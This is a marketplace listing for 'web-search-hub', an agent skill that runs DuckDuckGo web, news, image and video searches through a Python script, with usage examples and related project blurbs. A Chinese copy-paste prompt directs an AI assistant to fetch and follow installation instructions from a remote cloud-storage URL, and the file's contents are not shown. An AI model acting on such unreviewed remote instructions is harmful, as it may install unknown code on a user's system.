Overview
- Skill Key
- anisafifi/web-search-hub
- Author
- anisafifi
- Source Repo
- openclaw/skills
- Version
- -
- Source Path
- skills/anisafifi/web-search-hub
- Latest Commit SHA
- 8ee7965da3dd04258a8ab356c41f92b237866905
Use this skill when users need to search the web for information, news, images, or videos. Triggers include: requests to "search for", "find information about", "look up", "what's the latest on", or any request requiring current web content. Also use for research tasks, fact-checking, finding visual resources, or gathering recent news. Requires OpenClawCLI installation from clawhub.ai. Do NOT use when Claude's built-in web_search tool is more appropriate for simple queries.
Stars
0
Installs
0
Status
ACTIVE
Visibility
PUBLIC
直接复制以下提示词,发送给你的 AI 助手即可完成安装。
请先检查是否已安装 SkillHub 商店,若未安装,请根据 https://skillhub-1388575217.cos.ap-guangzhou.myqcloud.com/install/skillhub.md 安装 SkillHub 商店,然后安装 web-search-hub 技能。 若已安装,则直接安装 web-search-hub 技能。
# Web Search Hub Search the web using DuckDuckGo's API. Supports web pages, news articles, images, and videos with customizable filtering and output formats. ⚠️ **Prerequisite:** Install [OpenClawCLI](https://clawhub.ai/) (Windows, MacOS) and run `pip install duckduckgo-search` **Installation Best Practices:** - If you encounter permission errors, use a virtual environment instead of system-wide installation - For virtual environment: `python -m venv venv && source venv/bin/activate && pip install duckduckgo-search` - Never use `--break-system-packages` as it can damage your system's Python installation --- ## Quick Reference | Task | Command | |------|---------| | Basic web search | `python scripts/search.py "query"` | | Recent news | `python scripts/search.py "topic" --type news --time-range w` | | Find images | `python scripts/search.py "subject" --type images` | | Find videos | `python scripts/search.py "tutorial" --type videos` | | Save results | `python scripts/search.py "query" --output file.txt` | | JSON output | `python scripts/search.py "query" --format json` | --- ## Core Search Types ### Web Search (Default) Returns web pages with titles, URLs, and descriptions. ```bash python scripts/search.py "quantum computing" python scripts/search.py "python asyncio tutorial" --max-results 20 ``` ### News Search Returns articles with source, date, and summary. ```bash python scripts/search.py "climate summit" --type news python scripts/search.py "AI regulation" --type news --time-range d ``` ### Image Search Returns images with URLs, thumbnails, dimensions, and source. ```bash python scripts/search.py "mountain sunset" --type images python scripts/search.py "abstract art" --type images --image-color Blue ``` ### Video Search Returns videos with title, publisher, duration, date, and URL. ```bash python scripts/search.py "cooking tutorial" --type videos python scripts/search.py "documentary" --type videos --video-duration long ``` --- ## Essentia...
youmind-openlab
AI skill for OpenClaw & Claude Code — recommend from 10000+ Nano Banana Pro (Gemini) image prompts. Smart search by use case, content remix, sample images.
23blocks-os
AI Agent Orchestrator with Skills System - Give AI Agents superpowers: memory search, code graph queries, agent-to-agent messaging. Manage Claude, Codex or any AI Agent from one dashboard. Move Agents between computers and locations
hashgraph-online
AI agent skills for the Universal Registry - search, chat, and register 72,000+ agents across 14+ protocols. Works with Claude, Codex, Cursor, OpenClaw, and any AI assistant.
rito-w
A cross-platform skills manager for AI IDEs. Search marketplace, download locally, and install to Claude, Cursor, Windsurf, and more with one click.
besoeasy
Battle-tested skill library for AI agents. Save 98% of API costs with ready-to-use code for crypto, PDFs, search, web scraping & more. No trial-and-error, no expensive APIs.
zeropointrepo
YouTube Transcript API skills for AI agents. Get transcripts, search videos, browse channels. Works with OpenClaw, ClawdBot, Claude Code, Cursor, Windsurf.